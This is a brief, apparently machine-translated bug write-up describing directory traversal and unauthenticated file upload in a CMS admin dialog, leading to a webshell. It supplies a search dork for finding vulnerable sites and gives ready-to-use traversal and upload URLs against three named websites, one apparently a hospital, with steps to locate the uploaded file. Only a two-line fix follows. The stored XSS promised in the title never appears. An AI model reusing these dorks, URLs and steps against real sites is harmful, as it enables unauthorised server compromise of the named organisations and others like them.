Worry-free: storage-type xss + getshell

Worry-free: storage-type xss + getshell

Baidu keyword inurl: info. aspx? Code =

Arbitrary Directory Traversal

Http://www.312000.net/admin/dialog/FileList.aspx? Code = 0 & show = true & path =./Admin
 

Http://www.dyhospital.com/admin/dialog/FileList.aspx? Code = 0 & show = true & path = ./
 

Http://www.wlsph.com/admin/dialog/FileList.aspx? Code = 0 & show = true & path =./Admin/Dialog
 

Search for available upload points based on the previous Directory Traversal Vulnerability

Boring directory turning ······

Finally, find the uploaded file/admin/dialog/fileupload. aspx.

It seems that the default upload path is not executed.

Let's construct it.

Http://www.312000.net/admin/dialog/fileupload.aspx? Type = 1 & path =./Admin/Dialog

Http://www.dyhospital.com/admin/dialog/fileupload.aspx? Type = 1 & path =./Admin/Dialog

Http://www.wlsph.com/admin/dialog/fileupload.aspx? Type = 1 & path =./Admin/Dialog

What should I do if the uploaded file is renamed?

The previous directory traversal came in handy.
 

Use http://www.312000.net/as an example

 

In http://www.312000.net/admin/dialog/FileList.aspx? Code = 0 & show = true & path =./Admin/Dialog find the file (the browser needs to disable js scripts)
 

Visit

Http://www.312000.net/Admin/Dialog/201407301026743.txt
 

 

Solution:

Directory restrictions

Upload File whitelist